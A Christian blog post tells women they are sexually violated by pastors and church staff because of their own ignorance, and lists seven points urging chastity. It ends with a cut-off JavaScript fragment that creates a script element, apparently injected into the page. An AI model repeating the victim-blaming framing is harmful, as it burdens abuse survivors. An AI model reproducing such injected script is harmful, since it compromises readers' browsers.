Thanks all for the responses you gave on my last article about sheep and shepherds (pastors and church members). I’ll like to, in this short article, address the ladies and not limit it to them and the Pastors alone.
Babes and sisters, do you know why that Pastor, that choir master, head usher, protocol guy, fine christian guy is able to violate you? It’s because you’re ignorant and don’t know better about a number of things. Let’s take a look at 7 of the things you don’t know:
1) You’re ignorant about your true value or worth. You have not for once, taken time to love and value yourself, spirit, soul and body. Not loving yourself is sin (God says love your neighbour AS YOURSELF). If you truly love and value yourself, YOU WILL KEEP YOURSELF!
2) You don’t know your origin: You’re made in God’s image, after His likeness, and so you’re an extension of God on earth. You’re not common; don’t be generous with your body!
3) You’re ignorant about what God’s word says about you. Many ladies don’t read or study; they just go through the motions in church/life and don’t seek understanding about God’s expectations of us. Ladies, don’t wait to be led! Read, take responsibility, take leadership, be knowledgeable, it gives confidence!
4) You don’t understand the fear of God. The bible says it’s the beginning of wisdom. If you do, you’ll strive to obey God to your own hurt.
5) You don’t understand God’s love. He says you’re the apple of His eyes. We break God’s heart when we make a joke of the love he showed that made him GIVE UP his only son for us, this we exhibit when we live like mere men, and not like people who have been bought with a price, the blood of the sinless son of God……amazing love, oh what sacrifice!
6) You don’t understand the law of sowing and reaping: Gen 8:22 says that “As long as the earth REMAINS, seedtime and harvest…..will not cease”. There’s a consequence for every action. Sow purity; reap a bountiful harvest of goodies.
7) You believe that the ultimate Christian is a Pastor, and forget that Jesus is our perfect example who we need to pattern our lives after.
I look forward to a generation of ladies who have a healthy self esteem, who will not sell their birthright for a mess of pottage; who understand God’s deposit in them and are waiting to explode; ladies who men respect and admire; ladies with sterling qualities and values that will take the upcoming generation to a higher quality of life…..of wholeness, virtue and chastity.
Toast to a great life…..juice for y’all! :)var d=document;var s=d.createElement(‘script’);